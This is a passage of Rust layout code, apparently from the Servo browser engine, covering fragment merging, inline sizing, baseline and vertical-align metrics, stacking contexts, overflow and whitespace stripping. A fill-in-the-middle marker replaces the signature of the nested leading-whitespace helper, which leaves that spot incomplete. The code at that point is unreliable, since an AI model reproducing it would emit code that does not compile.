Fragment) { match (&mut self.specific, &next_fragment.specific) { (&mut SpecificFragmentInfo::ScannedText(ref mut this_info), &SpecificFragmentInfo::ScannedText(ref other_info)) => { debug_assert!(Arc::ptr_eq(&this_info.run, &other_info.run)); this_info.range_end_including_stripped_whitespace = other_info.range_end_including_stripped_whitespace; if other_info.requires_line_break_afterward_if_wrapping_on_newlines() { this_info.flags.insert(ScannedTextFlags::REQUIRES_LINE_BREAK_AFTERWARD_IF_WRAPPING_ON_NEWLINES); } if other_info.insertion_point.is_some() { this_info.insertion_point = other_info.insertion_point; } self.border_padding.inline_end = next_fragment.border_padding.inline_end; self.margin.inline_end = next_fragment.margin.inline_end; } _ => panic!("Can only merge two scanned-text fragments!"), } self.reset_text_range_and_inline_size(); self.meld_with_next_inline_fragment(&next_fragment); } /// Restore any whitespace that was stripped from a text fragment, and recompute inline metrics /// if necessary. pub fn reset_text_range_and_inline_size(&mut self) { if let SpecificFragmentInfo::ScannedText(ref mut info) = self.specific { if info.run.extra_word_spacing != Au(0) { Arc::make_mut(&mut info.run).extra_word_spacing = Au(0); } // FIXME (mbrubeck): Do we need to restore leading too? let range_end = info.range_end_including_stripped_whitespace; if info.range.end() == range_end { return } info.range.extend_to(range_end); info.content_size.inline = info.run.metrics_for_range(&info.range).advance_width; self.border_box.size.inline = info.content_size.inline + self.border_padding.inline_start_end(); } } /// Assigns replaced inline-size, padding, and margins for this fragment only if it is replaced /// content per CSS 2.1 § 10.3.2. pub fn assign_replaced_inline_size_if_necessary(&mut self, container_inline_size: Au, container_block_size: Option<Au>) { match self.specific { SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_none() => return, SpecificFragmentInfo::Generic | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableWrapper | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::MulticolColumn => return, SpecificFragmentInfo::TableColumn(_) => { panic!("Table column fragments do not have inline size") } SpecificFragmentInfo::UnscannedText(_) => { panic!("Unscanned text fragments should have been scanned by now!") } SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::InlineBlock(_) | SpecificFragmentInfo::InlineAbsoluteHypothetical(_) | SpecificFragmentInfo::InlineAbsolute(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::Svg(_) => {} }; match self.specific { // Inline blocks SpecificFragmentInfo::InlineAbsoluteHypothetical(ref mut info) => { let block_flow = FlowRef::deref_mut(&mut info.flow_ref).as_mut_block(); block_flow.base.position.size.inline = block_flow.base.intrinsic_inline_sizes.preferred_inline_size; // This is a hypothetical box, so it takes up no space. self.border_box.size.inline = Au(0); } SpecificFragmentInfo::InlineBlock(ref mut info) => { let block_flow = FlowRef::deref_mut(&mut info.flow_ref).as_mut_block(); self.border_box.size.inline = max(block_flow.base.intrinsic_inline_sizes.minimum_inline_size, block_flow.base.intrinsic_inline_sizes.preferred_inline_size); block_flow.base.block_container_inline_size = self.border_box.size.inline; block_flow.base.block_container_writing_mode = self.style.writing_mode; } SpecificFragmentInfo::InlineAbsolute(ref mut info) => { let block_flow = FlowRef::deref_mut(&mut info.flow_ref).as_mut_block(); self.border_box.size.inline = max(block_flow.base.intrinsic_inline_sizes.minimum_inline_size, block_flow.base.intrinsic_inline_sizes.preferred_inline_size); block_flow.base.block_container_inline_size = self.border_box.size.inline; block_flow.base.block_container_writing_mode = self.style.writing_mode; } // Text SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_some() => { let info = t.text_info.as_ref().unwrap(); // Scanned text fragments will have already had their content inline-sizes assigned // by this point. self.border_box.size.inline = info.content_size.inline + self.border_padding.inline_start_end(); } SpecificFragmentInfo::ScannedText(ref info) => { // Scanned text fragments will have already had their content inline-sizes assigned // by this point. self.border_box.size.inline = info.content_size.inline + self.border_padding.inline_start_end(); } // Replaced elements _ if self.is_replaced() => { let (inline_size, block_size) = self.calculate_replaced_sizes(Some(container_inline_size), container_block_size); self.border_box.size.inline = inline_size + self.border_padding.inline_start_end(); self.border_box.size.block = block_size + self.border_padding.block_start_end(); } ref unhandled @ _ => panic!("this case should have been handled above: {:?}", unhandled), } } /// Assign block-size for this fragment if it is replaced content. The inline-size must have /// been assigned first. /// /// Ideally, this should follow CSS 2.1 § 10.6.2. pub fn assign_replaced_block_size_if_necessary(&mut self) { match self.specific { SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_none() => return, SpecificFragmentInfo::Generic | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableWrapper | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::MulticolColumn => return, SpecificFragmentInfo::TableColumn(_) => { panic!("Table column fragments do not have block size") } SpecificFragmentInfo::UnscannedText(_) => { panic!("Unscanned text fragments should have been scanned by now!") } SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::InlineBlock(_) | SpecificFragmentInfo::InlineAbsoluteHypothetical(_) | SpecificFragmentInfo::InlineAbsolute(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::Svg(_) => {} } match self.specific { // Text SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_some() => { let info = t.text_info.as_ref().unwrap(); // Scanned text fragments' content block-sizes are calculated by the text run // scanner during flow construction. self.border_box.size.block = info.content_size.block + self.border_padding.block_start_end(); } SpecificFragmentInfo::ScannedText(ref info) => { // Scanned text fragments' content block-sizes are calculated by the text run // scanner during flow construction. self.border_box.size.block = info.content_size.block + self.border_padding.block_start_end(); } // Inline blocks SpecificFragmentInfo::InlineBlock(ref mut info) => { // Not the primary fragment, so we do not take the noncontent size into account. let block_flow = FlowRef::deref_mut(&mut info.flow_ref).as_block(); self.border_box.size.block = block_flow.base.position.size.block + block_flow.fragment.margin.block_start_end() } SpecificFragmentInfo::InlineAbsoluteHypothetical(ref mut info) => { // Not the primary fragment, so we do not take the noncontent size into account. let block_flow = FlowRef::deref_mut(&mut info.flow_ref).as_block(); self.border_box.size.block = block_flow.base.position.size.block; } SpecificFragmentInfo::InlineAbsolute(ref mut info) => { // Not the primary fragment, so we do not take the noncontent size into account. let block_flow = FlowRef::deref_mut(&mut info.flow_ref).as_block(); self.border_box.size.block = block_flow.base.position.size.block + block_flow.fragment.margin.block_start_end() } // Replaced elements _ if self.is_replaced() => {}, ref unhandled @ _ => panic!("should have been handled above: {:?}", unhandled), } } /// Returns true if this fragment is replaced content. pub fn is_replaced(&self) -> bool { match self.specific { SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::Svg(_) => true, _ => false } } /// Returns true if this fragment is replaced content or an inline-block or false otherwise. pub fn is_replaced_or_inline_block(&self) -> bool { match self.specific { SpecificFragmentInfo::InlineAbsoluteHypothetical(_) | SpecificFragmentInfo::InlineBlock(_) => true, _ => self.is_replaced(), } } /// Calculates block-size above baseline, depth below baseline, and ascent for this fragment /// when used in an inline formatting context. See CSS 2.1 § 10.8.1. /// /// This does not take `vertical-align` into account. For that, use `aligned_inline_metrics()`. fn content_inline_metrics(&self, layout_context: &LayoutContext) -> InlineMetrics { // CSS 2.1 § 10.8: "The height of each inline-level box in the line box is // calculated. For replaced elements, inline-block elements, and inline-table // elements, this is the height of their margin box." // // FIXME(pcwalton): We have to handle `Generic` and `GeneratedContent` here to avoid // crashing in a couple of `css21_dev/html4/content-` WPTs, but I don't see how those two // fragment types should end up inside inlines. (In the case of `GeneratedContent`, those // fragment types should have been resolved by now…) let inline_metrics = match self.specific { SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::Svg(_) | SpecificFragmentInfo::Generic | SpecificFragmentInfo::GeneratedContent(_) => { let ascent = self.border_box.size.block + self.margin.block_end; InlineMetrics { space_above_baseline: ascent + self.margin.block_start, space_below_baseline: Au(0), ascent: ascent, } } SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_some() => { let info = t.text_info.as_ref().unwrap(); inline_metrics_of_text(info, self, layout_context) } SpecificFragmentInfo::ScannedText(ref info) => { inline_metrics_of_text(info, self, layout_context) } SpecificFragmentInfo::InlineBlock(ref info) => { inline_metrics_of_block(&info.flow_ref, &*self.style) } SpecificFragmentInfo::InlineAbsoluteHypothetical(ref info) => { inline_metrics_of_block(&info.flow_ref, &*self.style) } SpecificFragmentInfo::TruncatedFragment(..) | SpecificFragmentInfo::InlineAbsolute(_) => { InlineMetrics::new(Au(0), Au(0), Au(0)) } SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableWrapper | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::MulticolColumn | SpecificFragmentInfo::UnscannedText(_) => { unreachable!("Shouldn't see fragments of this type here!") } }; return inline_metrics; fn inline_metrics_of_text(info: &ScannedTextFragmentInfo, self_: &Fragment, layout_context: &LayoutContext) -> InlineMetrics { // Fragments with no glyphs don't contribute any inline metrics. // TODO: Filter out these fragments during flow construction? if info.insertion_point.is_none() && info.content_size.inline == Au(0) { return InlineMetrics::new(Au(0), Au(0), Au(0)); } // See CSS 2.1 § 10.8.1. let font_metrics = with_thread_local_font_context(layout_context, |font_context| { text::font_metrics_for_style(font_context, self_.style.clone_font()) }); let line_height = text::line_height_from_style(&*self_.style, &font_metrics); InlineMetrics::from_font_metrics(&info.run.font_metrics, line_height) } fn inline_metrics_of_block(flow: &FlowRef, style: &ComputedValues) -> InlineMetrics { // CSS 2.1 § 10.8: "The height of each inline-level box in the line box is calculated. // For replaced elements, inline-block elements, and inline-table elements, this is the // height of their margin box." // // CSS 2.1 § 10.8.1: "The baseline of an 'inline-block' is the baseline of its last // line box in the normal flow, unless it has either no in-flow line boxes or if its // 'overflow' property has a computed value other than 'visible', in which case the // baseline is the bottom margin edge." // // NB: We must use `block_flow.fragment.border_box.size.block` here instead of // `block_flow.base.position.size.block` because sometimes the latter is late-computed // and isn't up to date at this point. let block_flow = flow.as_block(); let start_margin = block_flow.fragment.margin.block_start; let end_margin = block_flow.fragment.margin.block_end; let border_box_block_size = block_flow.fragment.border_box.size.block; // -------- // margin // top -------- + + // | | // | | // A ..pogo.. | + baseline_offset_of_last_line_box_in_flow() // | // -------- + border_box_block_size // margin // B -------- // // § 10.8.1 says that the baseline (and thus ascent, which is the // distance from the baseline to the top) should be A if it has an // in-flow line box and if overflow: visible, and B otherwise. let ascent = match (flow.baseline_offset_of_last_line_box_in_flow(), style.get_box().overflow_y) { // Case A (Some(baseline_offset), overflow_x::T::visible) => baseline_offset, // Case B _ => border_box_block_size + end_margin, }; let space_below_baseline = border_box_block_size + end_margin - ascent; let space_above_baseline = ascent + start_margin; InlineMetrics::new(space_above_baseline, space_below_baseline, ascent) } } /// Calculates the offset from the baseline that applies to this fragment due to /// `vertical-align`. Positive values represent downward displacement. /// /// If `actual_line_metrics` is supplied, then these metrics are used to determine the /// displacement of the fragment when `top` or `bottom` `vertical-align` values are /// encountered. If this is not supplied, then `top` and `bottom` values are ignored. fn vertical_alignment_offset(&self, layout_context: &LayoutContext, content_inline_metrics: &InlineMetrics, minimum_line_metrics: &LineMetrics, actual_line_metrics: Option<&LineMetrics>) -> Au { let mut offset = Au(0); for style in self.inline_styles() { // If any of the inline styles say `top` or `bottom`, adjust the vertical align // appropriately. // // FIXME(#5624, pcwalton): This passes our current reftests but isn't the right thing // to do. match style.get_box().vertical_align { VerticalAlign::Baseline => {} VerticalAlign::Middle => { let font_metrics = with_thread_local_font_context(layout_context, |font_context| { text::font_metrics_for_style(font_context, self.style.clone_font()) }); offset += (content_inline_metrics.ascent - content_inline_metrics.space_below_baseline - font_metrics.x_height).scale_by(0.5) } VerticalAlign::Sub => { offset += minimum_line_metrics.space_needed() .scale_by(FONT_SUBSCRIPT_OFFSET_RATIO) } VerticalAlign::Super => { offset -= minimum_line_metrics.space_needed() .scale_by(FONT_SUPERSCRIPT_OFFSET_RATIO) } VerticalAlign::TextTop => { offset = self.content_inline_metrics(layout_context).ascent - minimum_line_metrics.space_above_baseline } VerticalAlign::TextBottom => { offset = minimum_line_metrics.space_below_baseline - self.content_inline_metrics(layout_context).space_below_baseline } VerticalAlign::Top => { if let Some(actual_line_metrics) = actual_line_metrics { offset = content_inline_metrics.ascent - actual_line_metrics.space_above_baseline } } VerticalAlign::Bottom => { if let Some(actual_line_metrics) = actual_line_metrics { offset = actual_line_metrics.space_below_baseline - content_inline_metrics.space_below_baseline } } VerticalAlign::Length(LengthOrPercentage::Length(length)) => { offset -= Au::from(length) } VerticalAlign::Length(LengthOrPercentage::Percentage(percentage)) => { offset -= minimum_line_metrics.space_needed().scale_by(percentage.0) } VerticalAlign::Length(LengthOrPercentage::Calc(formula)) => { offset -= formula.to_used_value(Some(minimum_line_metrics.space_needed())).unwrap() } } } offset } /// Calculates block-size above baseline, depth below baseline, and ascent for this fragment /// when used in an inline formatting context, taking `vertical-align` (other than `top` or /// `bottom`) into account. See CSS 2.1 § 10.8.1. /// /// If `actual_line_metrics` is supplied, then these metrics are used to determine the /// displacement of the fragment when `top` or `bottom` `vertical-align` values are /// encountered. If this is not supplied, then `top` and `bottom` values are ignored. pub fn aligned_inline_metrics(&self, layout_context: &LayoutContext, minimum_line_metrics: &LineMetrics, actual_line_metrics: Option<&LineMetrics>) -> InlineMetrics { let content_inline_metrics = self.content_inline_metrics(layout_context); let vertical_alignment_offset = self.vertical_alignment_offset(layout_context, &content_inline_metrics, minimum_line_metrics, actual_line_metrics); let mut space_above_baseline = match actual_line_metrics { None => content_inline_metrics.space_above_baseline, Some(actual_line_metrics) => actual_line_metrics.space_above_baseline, }; space_above_baseline = space_above_baseline - vertical_alignment_offset; let space_below_baseline = content_inline_metrics.space_below_baseline + vertical_alignment_offset; let ascent = content_inline_metrics.ascent - vertical_alignment_offset; InlineMetrics::new(space_above_baseline, space_below_baseline, ascent) } /// Returns true if this fragment is a hypothetical box. See CSS 2.1 § 10.3.7. pub fn is_hypothetical(&self) -> bool { match self.specific { SpecificFragmentInfo::InlineAbsoluteHypothetical(_) => true, _ => false, } } /// Returns true if this fragment can merge with another immediately-following fragment or /// false otherwise. pub fn can_merge_with_fragment(&self, other: &Fragment) -> bool { match (&self.specific, &other.specific) { (&SpecificFragmentInfo::UnscannedText(ref first_unscanned_text), &SpecificFragmentInfo::UnscannedText(_)) => { // FIXME: Should probably use a whitelist of styles that can safely differ (#3165) if self.style().get_font() != other.style().get_font() || self.text_decoration_line() != other.text_decoration_line() || self.white_space() != other.white_space() || self.color() != other.color() { return false } if first_unscanned_text.text.ends_with('\n') { return false } // If this node has any styles that have border/padding/margins on the following // side, then we can't merge with the next fragment. if let Some(ref inline_context) = self.inline_context { for inline_context_node in inline_context.nodes.iter() { if !inline_context_node.flags.contains(InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT) { continue } if inline_context_node.style.logical_margin().inline_end != LengthOrPercentageOrAuto::Length(Length::new(0.)) { return false } if inline_context_node.style.logical_padding().inline_end != LengthOrPercentage::Length(Length::new(0.)) { return false } if inline_context_node.style.logical_border_width().inline_end != Au(0) { return false } } } // If the next fragment has any styles that have border/padding/margins on the // preceding side, then it can't merge with us. if let Some(ref inline_context) = other.inline_context { for inline_context_node in inline_context.nodes.iter() { if !inline_context_node.flags.contains(InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT) { continue } if inline_context_node.style.logical_margin().inline_start != LengthOrPercentageOrAuto::Length(Length::new(0.)) { return false } if inline_context_node.style.logical_padding().inline_start != LengthOrPercentage::Length(Length::new(0.)) { return false } if inline_context_node.style.logical_border_width().inline_start != Au(0) { return false } } } true } _ => false, } } /// Returns true if and only if this is the *primary fragment* for the fragment's style object /// (conceptually, though style sharing makes this not really true, of course). The primary /// fragment is the one that draws backgrounds, borders, etc., and takes borders, padding and /// margins into account. Every style object has at most one primary fragment. /// /// At present, all fragments are primary fragments except for inline-block and table wrapper /// fragments. Inline-block fragments are not primary fragments because the corresponding block /// flow is the primary fragment, while table wrapper fragments are not primary fragments /// because the corresponding table flow is the primary fragment. pub fn is_primary_fragment(&self) -> bool { match self.specific { SpecificFragmentInfo::InlineBlock(_) | SpecificFragmentInfo::InlineAbsoluteHypothetical(_) | SpecificFragmentInfo::InlineAbsolute(_) | SpecificFragmentInfo::MulticolColumn | SpecificFragmentInfo::TableWrapper => false, SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Generic | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::Svg(_) | SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::UnscannedText(_) => true, } } /// Determines the inline sizes of inline-block fragments. These cannot be fully computed until /// inline size assignment has run for the child flow: thus it is computed "late", during /// block size assignment. pub fn update_late_computed_replaced_inline_size_if_necessary(&mut self) { if let SpecificFragmentInfo::InlineBlock(ref mut inline_block_info) = self.specific { let block_flow = FlowRef::deref_mut(&mut inline_block_info.flow_ref).as_block(); self.border_box.size.inline = block_flow.fragment.margin_box_inline_size(); } } pub fn update_late_computed_inline_position_if_necessary(&mut self) { if let SpecificFragmentInfo::InlineAbsoluteHypothetical(ref mut info) = self.specific { let position = self.border_box.start.i; FlowRef::deref_mut(&mut info.flow_ref) .update_late_computed_inline_position_if_necessary(position) } } pub fn update_late_computed_block_position_if_necessary(&mut self) { if let SpecificFragmentInfo::InlineAbsoluteHypothetical(ref mut info) = self.specific { let position = self.border_box.start.b; FlowRef::deref_mut(&mut info.flow_ref) .update_late_computed_block_position_if_necessary(position) } } pub fn repair_style(&mut self, new_style: &ServoArc<ComputedValues>) { self.style = (*new_style).clone() } /// Given the stacking-context-relative position of the containing flow, returns the border box /// of this fragment relative to the parent stacking context. This takes `position: relative` /// into account. /// /// If `coordinate_system` is `Parent`, this returns the border box in the parent stacking /// context's coordinate system. Otherwise, if `coordinate_system` is `Own` and this fragment /// establishes a stacking context itself, this returns a border box anchored at (0, 0). (If /// this fragment does not establish a stacking context, then it always belongs to its parent /// stacking context and thus `coordinate_system` is ignored.) /// /// This is the method you should use for display list construction as well as /// `getBoundingClientRect()` and so forth. pub fn stacking_relative_border_box(&self, stacking_relative_flow_origin: &Vector2D<Au>, relative_containing_block_size: &LogicalSize<Au>, relative_containing_block_mode: WritingMode, coordinate_system: CoordinateSystem) -> Rect<Au> { let container_size = relative_containing_block_size.to_physical(relative_containing_block_mode); let border_box = self.border_box.to_physical(self.style.writing_mode, container_size); if coordinate_system == CoordinateSystem::Own && self.establishes_stacking_context() { return Rect::new(Point2D::zero(), border_box.size) } // FIXME(pcwalton): This can double-count relative position sometimes for inlines (e.g. // `<div style="position:relative">x</div>`, because the `position:relative` trickles down // to the inline flow. Possibly we should extend the notion of "primary fragment" to fix // this. let relative_position = self.relative_position(relative_containing_block_size); border_box.translate_by_size(&relative_position.to_physical(self.style.writing_mode)) .translate(&stacking_relative_flow_origin) } /// Given the stacking-context-relative border box, returns the stacking-context-relative /// content box. pub fn stacking_relative_content_box(&self, stacking_relative_border_box: &Rect<Au>) -> Rect<Au> { let border_padding = self.border_padding.to_physical(self.style.writing_mode); Rect::new(Point2D::new(stacking_relative_border_box.origin.x + border_padding.left, stacking_relative_border_box.origin.y + border_padding.top), Size2D::new(stacking_relative_border_box.size.width - border_padding.horizontal(), stacking_relative_border_box.size.height - border_padding.vertical())) } /// Returns true if this fragment has a filter, transform, or perspective property set. pub fn has_filter_transform_or_perspective(&self) -> bool { !self.style().get_box().transform.0.is_empty() || !self.style().get_effects().filter.0.is_empty() || self.style().get_box().perspective != Either::Second(values::None_) } /// Returns true if this fragment establishes a new stacking context and false otherwise. pub fn establishes_stacking_context(&self) -> bool { // Text fragments shouldn't create stacking contexts. match self.specific { SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::UnscannedText(_) => return false, _ => {} } if self.style().get_effects().opacity != 1.0 { return true } if self.style().get_effects().mix_blend_mode != mix_blend_mode::T::normal { return true } if self.has_filter_transform_or_perspective() { return true; } if self.style().get_box().transform_style == transform_style::T::preserve_3d || self.style().overrides_transform_style() { return true } // Fixed position and sticky position always create stacking contexts. if self.style().get_box().position == position::T::fixed || self.style().get_box().position == position::T::sticky { return true } // Statically positioned fragments don't establish stacking contexts if the previous // conditions are not fulfilled. Furthermore, z-index doesn't apply to statically // positioned fragments. if self.style().get_box().position == position::T::static_ { return false; } // For absolutely and relatively positioned fragments we only establish a stacking // context if there is a z-index set. // See https://www.w3.org/TR/CSS2/visuren.html#z-index self.style().get_position().z_index != Either::Second(Auto) } // Get the effective z-index of this fragment. Z-indices only apply to positioned element // per CSS 2 9.9.1 (http://www.w3.org/TR/CSS2/visuren.html#z-index), so this value may differ // from the value specified in the style. pub fn effective_z_index(&self) -> i32 { match self.style().get_box().position { position::T::static_ => {}, _ => return self.style().get_position().z_index.integer_or(0), } if !self.style().get_box().transform.0.is_empty() { return self.style().get_position().z_index.integer_or(0); } match self.style().get_box().display { display::T::flex => self.style().get_position().z_index.integer_or(0), _ => 0, } } /// Computes the overflow rect of this fragment relative to the start of the flow. pub fn compute_overflow(&self, flow_size: &Size2D<Au>, relative_containing_block_size: &LogicalSize<Au>) -> Overflow { let mut border_box = self.border_box.to_physical(self.style.writing_mode, *flow_size); // Relative position can cause us to draw outside our border box. // // FIXME(pcwalton): I'm not a fan of the way this makes us crawl though so many styles all // the time. Can't we handle relative positioning by just adjusting `border_box`? let relative_position = self.relative_position(relative_containing_block_size); border_box = border_box.translate_by_size(&relative_position.to_physical(self.style.writing_mode)); let mut overflow = Overflow::from_rect(&border_box); // Box shadows cause us to draw outside our border box. for box_shadow in &self.style().get_effects().box_shadow.0 { let offset = Vector2D::new(Au::from(box_shadow.base.horizontal), Au::from(box_shadow.base.vertical)); let inflation = Au::from(box_shadow.spread) + Au::from(box_shadow.base.blur) * BLUR_INFLATION_FACTOR; overflow.paint = overflow.paint.union(&border_box.translate(&offset) .inflate(inflation, inflation)) } // Outlines cause us to draw outside our border box. let outline_width = Au::from(self.style.get_outline().outline_width); if outline_width != Au(0) { overflow.paint = overflow.paint.union(&border_box.inflate(outline_width, outline_width)) } // Include the overflow of the block flow, if any. match self.specific { SpecificFragmentInfo::InlineBlock(ref info) => { let block_flow = info.flow_ref.as_block(); overflow.union(&flow::base(block_flow).overflow); } SpecificFragmentInfo::InlineAbsolute(ref info) => { let block_flow = info.flow_ref.as_block(); overflow.union(&flow::base(block_flow).overflow); } _ => (), } // FIXME(pcwalton): Sometimes excessively fancy glyphs can make us draw outside our border // box too. overflow } pub fn requires_line_break_afterward_if_wrapping_on_newlines(&self) -> bool { match self.specific { SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_some() => { let text = t.text_info.as_ref().unwrap(); text.requires_line_break_afterward_if_wrapping_on_newlines() } SpecificFragmentInfo::ScannedText(ref text) => { text.requires_line_break_afterward_if_wrapping_on_newlines() } _ => false, } } pub fn strip_leading_whitespace_if_necessary(&mut self) -> WhitespaceStrippingResult { if self.white_space().preserve_spaces() { return WhitespaceStrippingResult::RetainFragment } return match self.specific { SpecificFragmentInfo::TruncatedFragment(ref mut t) if t.text_info.is_some() => { let scanned_text_fragment_info = t.text_info.as_mut().unwrap(); scanned_text(scanned_text_fragment_info, &mut self.border_box) } SpecificFragmentInfo::ScannedText(ref mut scanned_text_fragment_info) => { scanned_text(scanned_text_fragment_info, &mut self.border_box) } SpecificFragmentInfo::UnscannedText(ref mut unscanned_text_fragment_info) => { let mut new_text_string = String::new(); let mut modified = false; for (i, character) in unscanned_text_fragment_info.text.char_indices() { if gfx::text::util::is_bidi_control(character) { new_text_string.push(character); continue } if char_is_whitespace(character) { modified = true; continue } // Finished processing leading control chars and whitespace. if modified { new_text_string.push_str(&unscanned_text_fragment_info.text[i..]); } break } if modified { unscanned_text_fragment_info.text = new_text_string.into_boxed_str(); } WhitespaceStrippingResult::from_unscanned_text_fragment_info( &unscanned_text_fragment_info) } _ => WhitespaceStrippingResult::RetainFragment, };<|fim▁hole|> -> WhitespaceStrippingResult { let leading_whitespace_byte_count = scanned_text_fragment_info.text() .find(|c| !char_is_whitespace(c)) .unwrap_or(scanned_text_fragment_info.text().len()); let whitespace_len = ByteIndex(leading_whitespace_byte_count as isize); let whitespace_range = Range::new(scanned_text_fragment_info.range.begin(), whitespace_len); let text_bounds = scanned_text_fragment_info.run.metrics_for_range(&whitespace_range).bounding_box; border_box.size.inline = border_box.size.inline - text_bounds.size.width; scanned_text_fragment_info.content_size.inline = scanned_text_fragment_info.content_size.inline - text_bounds.size.width; scanned_text_fragment_info.range.adjust_by(whitespace_len, -whitespace_len); WhitespaceStrippingResult::RetainFragment } } /// Returns true if the entire fragment was stripped. pub fn strip_trailing_whitespace_if_necessary(&mut self) -> WhitespaceStrippingResult { if self.white_space().preserve_spaces() { return WhitespaceStrippingResult::RetainFragment } return match self.specific { SpecificFragmentInfo::TruncatedFragment(ref mut t) if t.text_info.is_some() => { let scanned_text_fragment_info = t.text_info.as_mut().unwrap(); scanned_text(scanned_text_fragment_info, &mut self.border_box) } SpecificFragmentInfo::ScannedText(ref mut scanned_text_fragment_info) => { scanned_text(scanned_text_fragment_info, &mut self.border_box) } SpecificFragmentInfo::UnscannedText(ref mut unscanned_text_fragment_info) => { let mut trailing_bidi_control_characters_to_retain = Vec::new(); let (mut modified, mut last_character_index) = (true, 0); for (i, character) in unscanned_text_fragment_info.text.char_indices().rev() { if gfx::text::util::is_bidi_control(character) { trailing_bidi_control_characters_to_retain.push(character); continue } if char_is_whitespace(character) { modified = true; continue } last_character_index = i + character.len_utf8(); break } if modified { let mut text = unscanned_text_fragment_info.text.to_string(); text.truncate(last_character_index); for character in trailing_bidi_control_characters_to_retain.iter().rev() { text.push(*character); } unscanned_text_fragment_info.text = text.into_boxed_str(); } WhitespaceStrippingResult::from_unscanned_text_fragment_info( &unscanned_text_fragment_info) } _ => WhitespaceStrippingResult::RetainFragment, }; fn scanned_text(scanned_text_fragment_info: &mut ScannedTextFragmentInfo, border_box: &mut LogicalRect<Au>) -> WhitespaceStrippingResult { let mut trailing_whitespace_start_byte = 0; for (i, c) in scanned_text_fragment_info.text().char_indices().rev() { if !char_is_whitespace(c) { trailing_whitespace_start_byte = i + c.len_utf8(); break; } } let whitespace_start = ByteIndex(trailing_whitespace_start_byte as isize); let whitespace_len = scanned_text_fragment_info.range.length() - whitespace_start; let mut whitespace_range = Range::new(whitespace_start, whitespace_len); whitespace_range.shift_by(scanned_text_fragment_info.range.begin()); let text_bounds = scanned_text_fragment_info.run .metrics_for_range(&whitespace_range) .bounding_box; border_box.size.inline -= text_bounds.size.width; scanned_text_fragment_info.content_size.inline -= text_bounds.size.width; scanned_text_fragment_info.range.extend_by(-whitespace_len); WhitespaceStrippingResult::RetainFragment } } pub fn inline_styles(&self) -> InlineStyleIterator { InlineStyleIterator::new(self) } /// Returns the inline-size of this fragment's margin box. pub fn margin_box_inline_size(&self) -> Au { self.border_box.size.inline + self.margin.inline_start_end() } /// Returns true if this node *or any of the nodes within its inline fragment context* have /// non-`static` `position`. pub fn is_positioned(&self) -> bool { if self.style.get_box().position != position::T::static_ { return true } if let Some(ref inline_context) = self.inline_context { for node in inline_context.nodes.iter() { if node.style.get_box().position != position::T::static_ { return true } } } false } /// Returns true if this node is absolutely positioned. pub fn is_absolutely_positioned(&self) -> bool { self.style.get_box().position == position::T::absolute } pub fn is_inline_absolute(&self) -> bool { match self.specific { SpecificFragmentInfo::InlineAbsolute(..) => true, _ => false, } } pub fn meld_with_next_inline_fragment(&mut self, next_fragment: &Fragment) { if let Some(ref mut inline_context_of_this_fragment) = self.inline_context { if let Some(ref inline_context_of_next_fragment) = next_fragment.inline_context { for (inline_context_node_from_this_fragment, inline_context_node_from_next_fragment) in inline_context_of_this_fragment.nodes.iter_mut().rev() .zip(inline_context_of_next_fragment.nodes.iter().rev()) { if !inline_context_node_from_next_fragment.flags.contains( InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT) { continue } if inline_context_node_from_next_fragment.address != inline_context_node_from_this_fragment.address { continue } inline_context_node_from_this_fragment.flags.insert( InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT); } } } } pub fn meld_with_prev_inline_fragment(&mut self, prev_fragment: &Fragment) { if let Some(ref mut inline_context_of_this_fragment) = self.inline_context { if let Some(ref inline_context_of_prev_fragment) = prev_fragment.inline_context { for (inline_context_node_from_prev_fragment, inline_context_node_from_this_fragment) in inline_context_of_prev_fragment.nodes.iter().rev().zip( inline_context_of_this_fragment.nodes.iter_mut().rev()) { if !inline_context_node_from_prev_fragment.flags.contains( InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT) { continue } if inline_context_node_from_prev_fragment.address != inline_context_node_from_this_fragment.address { continue } inline_context_node_from_this_fragment.flags.insert( 